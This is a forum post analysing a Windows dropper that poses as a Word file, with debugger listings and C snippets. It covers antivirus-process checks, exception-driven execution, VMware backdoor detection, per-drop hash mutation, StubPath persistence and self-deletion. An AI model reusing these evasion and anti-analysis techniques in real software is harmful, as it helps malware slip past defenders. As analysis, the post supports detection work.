h_one
Posted on 2013-11-18 09:23
This post was last edited by zxcfvasd on 2013-11-18 09:23
Basic sample information:
Author: h_one
Packer: none
Affected platform: Windows
Summary:
The sample uses the Word icon to disguise itself as a .doc file; it is actually an exe. When the user double-clicks this virus, the process walks the current process list looking for avp.exe, 360tray.exe, KsfafSvc.exe or RsTray.exe.
a. If an anti-virus process is found, it only creates one file, '请你按照表格填写资料.doc' ("please fill in your details according to the form").
b. If no anti-virus is found, the real behaviour appears: it again first creates '请你按照表格填写资料.doc', then also creates alg.exe, and finally creates the batch file hostfix.bat to delete itself.
All of the files above are saved under the temp directory c:\DOCUME~1\AYL\LOCALS~1\Temp\xxxxxx
PS: what I find most interesting about this virus is that every one of its key actions is carried out inside an exception handler. This improves the program's stealth and makes reverse engineering harder.
Detailed analysis:
Entering the program's main function, you find that the dropper installs an exception handler of its own; follow it and set a breakpoint there (this is also the 'cute' part of this virus).
The first call in the figure below does the following: CreateFileW on the current program (the dropper itself), ReadFile reads 0x1000 bytes from the file, then a value is computed from the data read and used to verify that the dropper has not been modified.
call 0040189c obtains the address of CreateProcessW.
Next, follow call 401F59:
00401F64 |. E8 17100000 call sample(?00402F80 ; calls ZwQuerySystemInformation(5) to enumerate process information
00401F69 |. 8945 FC mov [local.1],eax
00401F6C |. 68 18C34000 push sample(?0040C318 ; ASCII "avp.exe"
00401F71 |. 8B45 FC mov eax,[local.1]
00401F74 |. 50 push eax ; ProcessInfo_buf
00401F75 |. E8 61110000 call sample(?004030DB ; walks the process names looking for avp.exe
00401F7A |. 83C4 08 add esp,0x8
00401F7D |. 85C0 test eax,eax
00401F7F |. 74 11 je Xsample(?00401F92 ; not taken when AV was found
00401F81 |. 8B0D 60D84000 mov ecx,dword ptr ds:[0x40D860]
00401F87 |. 890D 60D84000 mov dword ptr ds:[0x40D860],ecx
00401F8D |. E9 A4000000 jmp sample(?00402036
00401F92 |> 6A 1F push 0x1F
00401F94 |. E8 D8140000 call sample(?00403471
00401F99 |. 83C4 04 add esp,0x4
00401F9C |. 50 push eax
00401F9D |. 8B55 FC mov edx,[local.1]
00401FA0 |. 52 push edx
00401FA1 |. E8 35110000 call sample(?004030DB ; 360tray.exe
Follow call 00402f80 and take a look.
Note the argument passed to call 403471 in the figure above; call 403471 is the string-decryption function. The argument passed in here:
argument 4 decrypts to NtQuerySystemInformation
argument 1 decrypts to ntdll
By tracing it further you can see:
0x24 -> ShellExecuteW
0x22 -> Shell32.dll
0x18 -> VirtualAlloc
0x2  -> Kernel32.dll
0x5  -> GetVolumeInformation
0x6  -> GetAdaptersInfo
0x3  -> Iphlpapi.dll
0x1  -> ntdll.dll
0x9  -> NtCreateKey
0xA  -> NtClose
0x8  -> NtOpenKey
LoadLibrary and GetProcAddress are then called to get the function address. The whole series of functions that follows obtains its call addresses this way (after the address is obtained, call 4033E0 re-encrypts the function name and dll name).
After that:
00403000 |> /BA 01000000 /mov edx,0x1
00403005 |. |85D2 |test edx,edx
00403007 |. |74 5A |je Xsample(?00403063
00403009 |. |8D45 FC |lea eax,[local.1]
0040300C |. |50 |push eax
0040300D |. |8B4D F0 |mov ecx,[local.4]
00403010 |. |51 |push ecx
00403011 |. |8B55 F8 |mov edx,[local.2]
00403014 |. |52 |push edx
00403015 |. |6A 05 |push 0x5 ; 5 = enumerate process information
00403017 |. |FF15 C4D84000 |call dword ptr ds:[0x40D8C4] ; ntdll.ZwQuerySystemInformation
ZwQuerySystemInformation() is used to get the currently running processes.
It walks them to check whether anti-virus software is present; if not, execution reaches the call in the figure below, otherwise that call is never executed.
Follow this call:
it builds the string rasdial /disconnect
00401E02 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
00401E05 . 6A 15 push 0x15
00401E07 . E8 65160000 call sample(?00403471 ; /disconnect
00401E0C . 83C4 04 add esp,0x4
00401E0F . 50 push eax
00401E10 . 6A 14 push 0x14
00401E12 . E8 5A160000 call sample(?00403471 ; rasdial
00401E17 . 83C4 04 add esp,0x4
00401E1A . 50 push eax
00401E1B . 68 10C34000 push sample(?0040C310 ; ASCII "%s %s"
00401E20 . 68 04010000 push 0x104
00401E25 . 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-0x11C]
00401E2B . 50 push eax
00401E2C . E8 0F300000 call sample(?00404E40 ; strcat
Next is the spot where the exception is manufactured; the key virus behaviour is then executed in the exception handler. The method is to use time as the seed, ecx = rand(), and writing through ecx causes a memory access exception
(this is the highlight of this virus)
00401E55 . E8 A3270000 call sample(?004045FD ; _time
00401E5A . 83C4 04 add esp,0x4
00401E5D . 50 push eax
00401E5E . E8 72270000 call sample(?004045D5 ; timecola -> [40CE90]
00401E63 . 83C4 04 add esp,0x4
00401E66 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
00401E6D > B8 01000000 mov eax,0x1
00401E72 . 85C0 test eax,eax
00401E74 . 74 1A je Xsample(?00401E90
00401E76 . E8 64270000 call sample(?004045DF ; _rand
00401E7B . 8985 D8FCFFFF mov dword ptr ss:[ebp-0x328],eax
00401E81 . E8 59270000 call sample(?004045DF ; _rand
00401E86 . 8B8D D8FCFFFF mov ecx,dword ptr ss:[ebp-0x328]
00401E8C . 8801 mov byte ptr ds:[ecx],al ; raises the exception, control then goes to the exception handler
00401E8E .^ EB DD jmp Xsample(?00401E6D
00401E90 > C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
00401E97 . EB 1A jmp Xsample(?00401EB3
00401E99 . 8D95 DCFCFFFF lea edx,dword ptr ss:[ebp-0x324]
00401E9F . 52 push edx
00401EA0 . E8 D4FEFFFF call sample(?00401D79
00401EA5 . 83C4 04 add esp,0x4
00401EA8 . C3 retn
handler:
00404D68 /$ 55 push ebp ; structured exception handler
00404D69 |. 8BEC mov ebp,esp
00404D6B |. 83EC 08 sub esp,0x8
00404D6E |. 53 push ebx
00404D6F |. 56 push esi
00404D70 |. 57 push edi
00404D71 |. 55 push ebp
00404D72 |. FC cld
00404D73 |. 8B5D 0C mov ebx,[arg.2] ; EXCEPTION_REGISTRATION
00404D76 |. 8B45 08 mov eax,[arg.1] ; EXCEPTION_RECORD
00404D79 |. F740 04 06000>test dword ptr ds:[eax+0x4],0x6 ; exception flags
00404D80 |. 0F85 82000000 jnz sample(?00404E08
00404D86 |. 8945 F8 mov [local.2],eax ; [local] = Exception_Record
00404D89 |. 8B45 10 mov eax,[arg.3] ; Context
00404D8C |. 8945 FC mov [local.1],eax ; [local] = Context
00404D8F |. 8D45 F8 lea eax,[local.2]
00404D92 |. 8943 FC mov dword ptr ds:[ebx-0x4],eax
00404D95 |. 8B73 0C mov esi,dword ptr ds:[ebx+0xC]
00404D98 |. 8B7B 08 mov edi,dword ptr ds:[ebx+0x8]
00404D9B |> 83FE FF /cmp esi,-0x1
00404D9E |. 74 61 |je Xsample(?00404E01
00404DA0 |. 8D0C76 |lea ecx,dword ptr ds:[esi+esi*2]
00404DA3 |. 837C8F 04 00 |cmp dword ptr ds:[edi+ecx*4+0x4],0x0
00404DA8 |. 74 45 |je Xsample(?00404DEF
00404DAA |. 56 |push esi
00404DAB |. 55 |push ebp
00404DAC |. 8D6B 10 |lea ebp,dword ptr ds:[ebx+0x10]
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4] ;
Entering the exception handling, it is obvious that the author used __try/__except.
Clearly call dword ptr ds:[edi+ecx*4+0x4] is the key call; let's step into it and see what it does.
00401E99 . 8D95 DCFCFFFF lea edx,dword ptr ss:[ebp-0x324]
00401E9F . 52 push edx
00401EA0 . E8 D4FEFFFF call sample(?00401D79
00401EA5 . 83C4 04 add esp,0x4
00401EA8 . C3 retn
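The handler listing above (00404D9B to 00404DAF) is the scope-table walk of the MSVC x86 runtime's _except_handler3: esi is the frame's current trylevel, edi its scope table, each entry is three dwords (enclosing level, filter, handler), and `call [edi+ecx*4+0x4]` invokes the filter of the innermost __try that has one. The C below is an added example that is not part of the original post; it models those structures with its own struct names (`scope_entry`, `exc_registration` are this example's names, not the compiler's) and a constructed two-level table, so you can see which filter the runtime picks for a given trylevel.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x86 MSVC SEH frame as used by _except_handler3.  Field offsets match the
   listing: [ebx+8] = scope table, [ebx+0xC] = trylevel, [ebx+0x10] = saved ebp.
   Struct and field names are this example's own, not the compiler's. */
typedef struct scope_entry {
    int32_t enclosing_level;      /* +0: trylevel of the enclosing __try, -1 if none */
    int   (*filter)(void);        /* +4: __except filter; NULL for a __finally block */
    void  (*handler)(void);       /* +8: __except body (or the __finally body)       */
} scope_entry;

typedef struct exc_registration {
    struct exc_registration *prev;  /* +0  */
    void *handler;                  /* +4  _except_handler3 itself               */
    const scope_entry *scopetable;  /* +8  -> edi in the listing                */
    int32_t trylevel;               /* +C  -> esi in the listing                */
    uintptr_t saved_ebp;            /* +10 frame pointer the filter is run with */
} exc_registration;

/* Mirror of the loop starting at 00404D9B: from the current trylevel walk
   outward via enclosing_level until an entry with a filter is found (that
   filter is what "call [edi+ecx*4+0x4]" invokes).  Returns the index of that
   entry, or -1 when the chain ends without one. */
int locate_active_filter(const exc_registration *reg)
{
    int32_t level = reg->trylevel;
    while (level != -1) {                                /* cmp esi,-1 */
        const scope_entry *e = &reg->scopetable[level];  /* ecx = esi*3 dwords */
        if (e->filter != NULL)                           /* cmp [edi+ecx*4+4],0 */
            return level;
        level = e->enclosing_level;   /* __finally entry: keep walking outward */
    }
    return -1;
}

/* Constructed stand-ins for the filter/handler functions of a frame with
   an outer __try/__except wrapping an inner __try/__finally. */
static int  outer_filter(void)  { return 1; }   /* EXCEPTION_EXECUTE_HANDLER */
static void outer_handler(void) { puts("outer __except body"); }
static void inner_finally(void) { puts("inner __finally body"); }

static const scope_entry demo_table[] = {
    { -1, outer_filter, outer_handler },  /* level 0: __try/__except          */
    {  0, NULL,         inner_finally },  /* level 1: nested __try/__finally  */
};

/* Build a constructed registration record for the given trylevel and run the walk. */
int demo_filter_index(int32_t trylevel)
{
    exc_registration reg = { NULL, NULL, demo_table, trylevel, 0 };
    return locate_active_filter(&reg);
}

int main(void)
{
    printf("fault inside level 1 -> filter at level %d\n", demo_filter_index(1));
    printf("fault inside level 0 -> filter at level %d\n", demo_filter_index(0));
    printf("fault outside any __try -> %d\n", demo_filter_index(-1));
    return 0;
}
```

When reading a dump, the same arithmetic applies: take trylevel from [ebx+0xC], multiply by 12, and the filter pointer sits 4 bytes into that scope-table entry; a NULL there means a __finally block and the walk continues with the dword at offset 0.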
Follow the call:
You can see that inside the exception handling CreateProcessW is called to disconnect the broadband connection (weisuo)
00401DB5 |. 51 push ecx
00401DB6 |. 8D55 AC lea edx,[local.21]
00401DB9 |. 52 push edx
00401DBA |. 6A 00 push 0x0
00401DBC |. 6A 00 push 0x0
00401DBE |. 6A 00 push 0x0
00401DC0 |. 6A 01 push 0x1
00401DC2 |. 6A 00 push 0x0
00401DC4 |. 6A 00 push 0x0
00401DC6 |. 8B45 08 mov eax,[arg.1]
00401DC9 |. 50 push eax ; rasdial /disconnect
00401DCA |. 6A 00 push 0x0
00401DCC |. FF15 C0234100 call dword ptr ds:[0x4123C0] ; kernel32.CreateProcessW
004028E6 . E8 11F1FFFF call sample(?004019FC
This call creates the temp file C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\请您按照表格填写资料.doc, copies 0x6600 bytes from offset 0x20000 of the dropper, decrypts them, writes them with WriteFile into '请您按照表格填写资料.doc' (to fool ordinary users), and finally opens the .doc with ShellExecuteW.
00401A9F |. E8 C7F5FFFF call sample(?0040106B
00401AA4 |. 83C4 0C add esp,0xC
00401AA7 |. 68 14254100 push sample(?00412514
00401AAC |. 8D8D F8FDFFFF lea ecx,[local.130]
00401AB2 |. 51 push ecx
00401AB3 |. 68 04254100 push sample(?00412504
00401AB8 |. 8B15 50D84000 mov edx,dword ptr ds:[0x40D850]
00401ABE |. 52 push edx
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; copies 0x6600 bytes from dropper offset 0x20000, decrypts them, then
00401AC4 |. 83C4 10 add esp,0x10 ; writes the decrypted data into the .doc with WriteFile
00401AC7 |. 85C0 test eax,eax
00401AC9 |. 75 07 jnz Xsample(?00401AD2
00401ACB |. 6A 00 push 0x0
00401ACD |. E8 4F2F0000 call sample(?00404A21
00401AD2 |> 8D85 F8FDFFFF lea eax,[local.130]
00401AD8 |. 50 push eax
00401AD9 |. 68 C0C24000 push sample(?0040C2C0 ; UNICODE ""%s""
00401ADE |. 8D8D F0FBFFFF lea ecx,[local.260]
00401AE4 |. 51 push ecx
00401AE5 |. E8 0C300000 call sample(?00404AF6 ; _swprintf
00401AEA |. 83C4 0C add esp,0xC
00401AED |. 6A 05 push 0x5
00401AEF |. 6A 00 push 0x0
00401AF1 |. 6A 00 push 0x0
00401AF3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401AF9 |. 52 push edx
00401AFA |. 68 CCC24000 push sample(?0040C2CC ; UNICODE "edit"
00401AFF |. 6A 00 push 0x0
00401B01 |. FF15 58D84000 call dword ptr ds:[0x40D858] ; Shell32.ShellExecuteW
00401B07 |. 83C4 18 add esp,0x18
00401B0A |. 8BE5 mov esp,ebp
00401B0C |. 5D pop ebp
Haha, no AV around, and the decoy .doc is up and running too. Hehe, now the creepy uncle has to show his face.
Whether to do?
The same method is used to construct an exception:
00402907 . E8 F11C0000 call sample(?004045FD ; _time
0040290C . 83C4 04 add esp,0x4
0040290F . 50 push eax
00402910 . E8 C01C0000 call sample(?004045D5
00402915 . 83C4 04 add esp,0x4
00402918 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
0040291F > B8 01000000 mov eax,0x1
00402924 . 85C0 test eax,eax
00402926 . 74 14 je Xsample(?0040293C
00402928 . E8 B21C0000 call sample(?004045DF ; _rand
0040292D . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
00402930 . E8 AA1C0000 call sample(?004045DF ; _rand
00402935 . 8B4D C8 mov ecx,dword ptr ss:[ebp-0x38] ; ecx = the previous _rand value
00402938 . 8801 mov byte ptr ds:[ecx],al ; triggers the exception
Into the exception without trouble; step into this call.
Following the call you arrive here. Hehe, it also performs a virtual-machine check, using a privileged instruction (PS: this virus is really clever: it knows today's AV is strong, so it doesn't fight it head-on, and this way it dodges the AV's virtual-machine engine, making it very hard for the AV to spot it).
004025B8 . C745 E4 01000>mov dword ptr ss:[ebp-0x1C],0x1
004025BF . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
004025C6 . 52 push edx
004025C7 . 51 push ecx
004025C8 . 53 push ebx
004025C9 . B8 68584D56 mov eax,0x564D5868
004025CE . BB 00000000 mov ebx,0x0
004025D3 . B9 0A000000 mov ecx,0xA
004025D8 . BA 58560000 mov edx,0x5658
004025DD . ED in eax,dx
004025DE . 81FB 68584D56 cmp ebx,0x564D5868
004025E4 . 0F9445 E4 sete byte ptr ss:[ebp-0x1C]
004025E8 . 5B pop ebx
004025E9 . 59 pop ecx
004025EA . 5A pop edx
004025EB . C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
004025F2 . EB 17 jmp Xsample(?0040260B
004025F4 . B8 01000000 mov eax,0x1
Next comes the second key function of the exception handling:
00404DEB |. FF548F 08 |call dword ptr ds:[edi+ecx*4+0x8]
00402955 . 8B65 E8 mov esp,dword ptr ss:[ebp-0x18]
00402958 . C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
0040295F > 33C0 xor eax,eax
00402961 . 85C0 test eax,eax
00402963 .^ 75 A0 jnz Xsample(?00402905
00402965 . E8 A4F1FFFF call sample(?00401B0E
Next it creates alg.exe in the temp directory, copies the data out of the dropper, decrypts it to obtain alg.exe's data, and writes it.
004016C0 |. 0395 BCFDFFFF ||add edx,[local.145]
004016C6 |. 33C0 ||xor eax,eax
004016C8 |. 8A02 ||mov al,byte ptr ds:[edx]
004016CA |. 8B4D 0C ||mov ecx,[arg.2]
004016CD |. 038D C8FDFFFF ||add ecx,[local.142]
004016D3 |. 33D2 ||xor edx,edx
004016D5 |. 8A51 10 ||mov dl,byte ptr ds:[ecx+0x10]
004016D8 |. 33C2 ||xor eax,edx
004016DA |. 8885 C4FDFFFF ||mov byte ptr ss:[ebp-0x23C],al
004016E0 |. 8B45 0C ||mov eax,[arg.2]
004016E3 |. 0385 C8FDFFFF ||add eax,[local.142]
004016E9 |. 8B8D D0FDFFFF ||mov ecx,[local.140]
004016EF |. 038D BCFDFFFF ||add ecx,[local.145]
004016F5 |. 8A50 10 ||mov dl,byte ptr ds:[eax+0x10]
004016F8 |. 2A11 ||sub dl,byte ptr ds:[ecx]
004016FA |. 8B45 0C ||mov eax,[arg.2]
004016FD |. 0385 C8FDFFFF ||add eax,[local.142]
00401703 |. 8850 10 ||mov byte ptr ds:[eax+0x10],dl
00401706 |. 8B8D D0FDFFFF ||mov ecx,[local.140]
0040170C |. 038D BCFDFFFF ||add ecx,[local.145]
00401712 |. 8A95 C4FDFFFF ||mov dl,byte ptr ss:[ebp-0x23C]
00401718 |. 8811 ||mov byte ptr ds:[ecx],dl
0040171A |.^ E9 68FFFFFF |\jmp sample(?00401687 ; decrypts the data copied out of the dropper
The decrypted alg.exe data is 0x11000 bytes; it can now be dumped with LordPE (PS: my guess is this is a trojan; we'll enjoy it later...)
Next, this call:
00401771 |. 50 push eax ; alg.exe data
00401772 |. 8B8D CCFDFFFF mov ecx,[local.141]
00401778 |. 51 push ecx ; size
00401779 |. E8 47FBFFFF call sample(?004012C5 ; seeds with the time to generate data, then overwrites 0xA bytes at offset F040 of the child program
004012DB |. E8 1D330000 call sample(?004045FD ; _time
004012E0 |. 83C4 04 add esp,0x4
004012E3 |. 50 push eax
004012E4 |. E8 EC320000 call sample(?004045D5 ; saves the time in [40CE90]
004012E9 |. 83C4 04 add esp,0x4
004012EC |. C745 FC 00000>mov [local.1],0x0
004012F3 |. EB 09 jmp Xsample(?004012FE
004012F5 |> 8B45 FC /mov eax,[local.1]
004012F8 |. 83C0 01 |add eax,0x1
004012FB |. 8945 FC |mov [local.1],eax
004012FE |> 8B4D FC mov ecx,[local.1]
00401301 |. 3B4D 0C |cmp ecx,[arg.2] ; size
00401304 |. 73 60 |jnb Xsample(?00401366
00401306 |. 6A 0A |push 0xA
00401308 |. 8B55 08 |mov edx,[arg.1] ; addr
0040130B |. 0355 FC |add edx,[local.1]
0040130E |. 52 |push edx
0040130F |. 68 80C04000 |push sample(?0040C080
00401314 |. E8 472F0000 |call sample(?00404260 ; _strncmp (searches the child program data for the F1 string)
00401319 |. 83C4 0C |add esp,0xC
0040131C |. 85C0 |test eax,eax
0040131E |. 75 44 |jnz Xsample(?00401364 ; F1 found at address F040
00401320 |. C745 F8 00000>|mov [local.2],0x0
00401327 |. EB 09 |jmp Xsample(?00401332
00401329 |> 8B45 F8 |/mov eax,[local.2]
0040132C |. 83C0 02 ||add eax,0x2
0040132F |. 8945 F8 ||mov [local.2],eax
00401332 |> 837D F8 0A | cmp [local.2],0xA
00401336 |. 7D 24 ||jge Xsample(?0040135C
00401338 |. E8 A2320000 ||call sample(?004045DF ; _rand
0040133D |. 8945 F4 ||mov [local.3],eax ; time-seeded random value, written into the child program
00401340 |. 6A 02 ||push 0x2
00401342 |. 8D4D F4 ||lea ecx,[local.3]
00401345 |. 51 ||push ecx ; Src
00401346 |. 8B55 FC ||mov edx,[local.1]
00401349 |. 0355 F8 ||add edx,[local.2]
0040134C |. 8B45 08 ||mov eax,[arg.1]
0040134F |. 03C2 ||add eax,edx
00401351 |. 50 ||push eax ; patches the located address F040
00401352 |. E8 492F0000 ||call sample(?004042A0 ; memcpy
00401357 |. 83C4 0C ||add esp,0xC
0040135A |.^ EB CD |\jmp Xsample(?00401329 ; writes 0xA bytes in total; every run of the dropper makes the child alg.exe different (improves alg.exe's survivability)
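The routine above is why two alg.exe files dropped by the same sample never share a file hash: it finds a 10-byte marker with strncmp and overwrites it with five 2-byte pieces of time-seeded rand() output. The C below is an added example, not code from the post or from the sample; it re-implements that patch on a constructed buffer (the marker bytes `F1-MARKER-` and the payload text are made up, since the page only says the real marker starts with "F1"), then shows the defender's counterpart: a fingerprint that masks the mutable window so two drops still compare equal.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Length of the patched window: the listing writes 5 x 2 bytes = 0xA. */
#define PATCH_LEN 10

/* Constructed stand-in for the 10-byte marker at 0040C080 (assumption:
   the real bytes are not on the page beyond starting with "F1"). */
static const char MARKER[PATCH_LEN + 1] = "F1-MARKER-";

/* Mirror of sub_4012C5: locate the marker with strncmp and overwrite it with
   five 2-byte chunks of rand() output.  Returns the offset patched, or -1. */
long patch_marker(unsigned char *image, size_t size, unsigned seed)
{
    srand(seed);                                   /* the sample seeds with time() */
    for (size_t i = 0; i + PATCH_LEN <= size; ++i) {
        if (strncmp((const char *)image + i, MARKER, PATCH_LEN) != 0)
            continue;
        for (size_t off = 0; off < PATCH_LEN; off += 2) {
            int r = rand();
            memcpy(image + i + off, &r, 2);        /* low two bytes of each rand() */
        }
        return (long)i;
    }
    return -1;
}

/* FNV-1a over the image with one byte range masked to zero, so the random
   window does not influence the fingerprint.  skip < 0 masks nothing. */
uint32_t fnv1a_masked(const unsigned char *image, size_t size, long skip, size_t skip_len)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < size; ++i) {
        unsigned char b = image[i];
        if (skip >= 0 && i >= (size_t)skip && i < (size_t)skip + skip_len)
            b = 0;
        h ^= b;
        h *= 16777619u;
    }
    return h;
}

/* Two drops of a constructed payload patched with different seeds: returns 1
   when the raw images differ but the masked fingerprints agree. */
int demo_two_drops_differ_but_match(void)
{
    static const char base[] = "MZ..constructed payload..F1-MARKER-..tail";
    unsigned char a[sizeof base], b[sizeof base];
    memcpy(a, base, sizeof base);
    memcpy(b, base, sizeof base);
    long oa = patch_marker(a, sizeof a, 1000);
    long ob = patch_marker(b, sizeof b, 2000);
    if (oa < 0 || oa != ob)
        return 0;
    int raw_differ   = memcmp(a, b, sizeof a) != 0;
    int masked_equal = fnv1a_masked(a, sizeof a, oa, PATCH_LEN) ==
                       fnv1a_masked(b, sizeof b, ob, PATCH_LEN);
    return raw_differ && masked_equal;
}

/* A buffer without the marker is left untouched. */
int demo_missing_marker(void)
{
    unsigned char buf[] = "no marker in this buffer";
    return (int)patch_marker(buf, sizeof buf, (unsigned)time(NULL));
}

int main(void)
{
    printf("drops differ but masked fingerprints match: %d\n", demo_two_drops_differ_but_match());
    printf("patch on buffer without marker: %d\n", demo_missing_marker());
    return 0;
}
```

The same idea applies when hunting for this family on disk: hashing the dropped alg.exe whole will give a new value per infection, whereas hashing around the 10-byte window at the known offset (0xF040 per the listing) gives a stable indicator.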
Step into the last call in the figure above:
#include <string.h>
typedef unsigned char _BYTE;
#ifndef _MSC_VER
#define __cdecl
#endif

/* Hex-Rays output; the declarations the decompiler omitted are added so it compiles.
   a4 points at 10 key bytes, a3 receives a 16-byte record built from Src and a2. */
char __cdecl sub_403260(void *Src, const void *a2, int a3, int a4)
{
  int i, j, k, l;
  unsigned char v4, v6, v7;
  char result;

  // decode the 4 bytes at Src and the 6 bytes at a2 with the key bytes at a4
  for ( i = 0; i < 4; ++i )
    *((_BYTE *)Src + i) ^= *(_BYTE *)(i + a4);
  for ( j = 0; j < 6; ++j )
    *((_BYTE *)a2 + j) ^= *(_BYTE *)(j + a4 + 4);
  // lay out the 16-byte record at a3: Src[0..1], a2[0..5], Src[2..3], a2[0..5]
  memcpy((void *)a3, Src, 2u);
  memcpy((void *)(a3 + 2), a2, 6u);
  memcpy((void *)(a3 + 8), (char *)Src + 2, 2u);
  memcpy((void *)(a3 + 10), a2, 6u);
  // rolling XOR over bytes 2..7, keyed by byte0 ^ byte1
  v6 = *(_BYTE *)(a3 + 1) ^ *(_BYTE *)a3;
  for ( k = 2; k < 8; ++k )
  {
    *(_BYTE *)(k + a3) ^= v6;
    v6 += *(_BYTE *)(k + a3);
  }
  // same over bytes 10..15, keyed by (byte8 ^ byte9) plus the running value
  v4 = *(_BYTE *)(a3 + 9) ^ *(_BYTE *)(a3 + 8);
  result = v4 + v6;
  v7 = v4 + v6;
  for ( l = 10; l < 16; ++l )
  {
    result = l + a3;   // decompiler artifact: the return value carries no meaning
    *(_BYTE *)(l + a3) ^= v7;
    v7 += *(_BYTE *)(l + a3);
  }
  return result;
}
Then we come back once more to
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4] ; virtual-machine check
Exception handling is used once more to execute the virus's key behaviour:
00401D3B . 8D95 D0FAFFFF lea edx,dword ptr ss:[ebp-0x530]
00401D41 . 52 push edx //alg.exe
00401D42 . E8 32000000 call sample(?00401D79
00401D47 . 83C4 04 add esp,0x4
00401D4A . C3 retn
call 00401D79:
00401DAC |. 66:C745 DC 00>mov word ptr ss:[ebp-0x24],0x0
00401DB2 |. 8D4D F0 lea ecx,[local.4]
00401DB5 |. 51 push ecx ; /pProcessInfo
00401DB6 |. 8D55 AC lea edx,[local.21] ; |
00401DB9 |. 52 push edx ; |pStartupInfo
00401DBA |. 6A 00 push 0x0 ; |CurrentDir = NULL
00401DBC |. 6A 00 push 0x0 ; |pEnvironment = NULL
00401DBE |. 6A 00 push 0x0 ; |CreationFlags = 0
00401DC0 |. 6A 01 push 0x1 ; |InheritHandles = TRUE
00401DC2 |. 6A 00 push 0x0 ; |pThreadSecurity = NULL
00401DC4 |. 6A 00 push 0x0 ; |pProcessSecurity = NULL
00401DC6 |. 8B45 08 mov eax,[arg.1] ; |
00401DC9 |. 50 push eax ;
00401DCA |. 6A 00 push 0x0 ; |ModuleFileName = NULL
00401DCC |. FF15 C0234100 call dword ptr ds:[0x4123C0] ; \CreateProcessW
00401DD2 |. B8 01000000 mov eax,0x1
Creates the alg.exe process (this should be the virus's true face).
It then calls NtCreateKey to create a key, and then ZwOpenKey and ZwSetValueKey to set the registry value: data "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alg.exe", value name StubPath.
The last call creates the batch file hostfix.bat in the temp directory;
its purpose is to delete the dropper itself.
0040268D > \8B4D 08 mov ecx,dword ptr ss:[ebp+0x8]
00402690 . 51 push ecx ; /StringToAdd
00402691 . 8D95 C8FCFFFF lea edx,dword ptr ss:[ebp-0x338] ; |
00402697 . 52 push edx ; |ConcatString
00402698 . FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrc>; \lstrcatW
0040269E . 6A 00 push 0x0 ; /hTemplateFile = NULL
004026A0 . 6A 00 push 0x0 ; |Attributes = 0
004026A2 . 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004026A4 . 6A 00 push 0x0 ; |pSecurity = NULL
004026A6 . 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004026A8 . 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004026AD . 8D85 C8FCFFFF lea eax,dword ptr ss:[ebp-0x338] ; |
004026B3 . 50 push eax ; |FileName
004026B4 . FF15 20B04000 call dword ptr ds:[<&KERNEL32.Creat>; \CreateFileW
004026BA . 8985 C4FCFFFF mov dword ptr ss:[ebp-0x33C],eax ; creates the .bat file
004026C0 . 83BD C4FCFFFF>cmp dword ptr ss:[ebp-0x33C],-0x1
004026C7 . 75 07 jnz Xsample(?004026D0
004026C9 . 33C0 xor eax,eax
004026CB . E9 93010000 jmp sample(?00402863
004026D0 > C785 D4FEFFFF>mov dword ptr ss:[ebp-0x12C],0x0
004026DA . EB 0F jmp Xsample(?004026EB
004026DC > 8B8D D4FEFFFF mov ecx,dword ptr ss:[ebp-0x12C]
004026E2 . 83C1 01 add ecx,0x1
004026E5 . 898D D4FEFFFF mov dword ptr ss:[ebp-0x12C],ecx
004026EB > 83BD D4FEFFFF>cmp dword ptr ss:[ebp-0x12C],0x4B
004026F2 . 73 46 jnb Xsample(?0040273A
004026F4 . 8B95 D4FEFFFF mov edx,dword ptr ss:[ebp-0x12C]
004026FA . 33C0 xor eax,eax
004026FC . 8A82 34C04000 mov al,byte ptr ds:[edx+0x40C034]
00402702 . 8985 DCFEFFFF mov dword ptr ss:[ebp-0x124],eax
00402708 . 8B8D D4FEFFFF mov ecx,dword ptr ss:[ebp-0x12C]
0040270E . 8A91 34C04000 mov dl,byte ptr ds:[ecx+0x40C034]
00402714 . 3215 30C04000 xor dl,byte ptr ds:[0x40C030]
0040271A . 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-0x12C]
00402720 . 8890 34C04000 mov byte ptr ds:[eax+0x40C034],dl
00402726 . 8A0D 30C04000 mov cl,byte ptr ds:[0x40C030]
0040272C . 028D DCFEFFFF add cl,byte ptr ss:[ebp-0x124]
00402732 . 880D 30C04000 mov byte ptr ds:[0x40C030],cl
00402738 .^ EB A2 jmp Xsample(?004026DC
0040273A > 68 04010000 push 0x104
Finally, again using a self-constructed exception, hostfix.bat is run from the exception handler to delete the dropper.
That completes the analysis of the dropper's behaviour.
To summarize why the AV initially did nothing about this virus:
1. Every dangerous function and important API is obtained through an index value that is decrypted into the API name, after which LoadLibrary and GetProcAddress give the call address.
2. ZwQuerySystemInformation is used to get the running processes and check for AV; if AV is present it doesn't fight it and only creates the .doc document.
3. Most AV engines today run the virus in a virtual-machine engine; this virus performs a VM check inside its exception handling and exits if it finds it is running in a VM.
4. If it is not in a VM and there is no AV, it extracts the alg.exe data from the dropper carrier, decrypts it, then constructs an exception itself and runs alg.exe inside the exception handling.
Virtual-machine check code:
#include <windows.h>
#include <tchar.h>

BOOL IsbVm()
{
    BOOL bRet = TRUE;
    __try
    {
        __asm
        {
            push edx
            push eax
            push ebx
            mov eax, 'VMXh'     // VMware backdoor magic
            mov ebx, 0x0
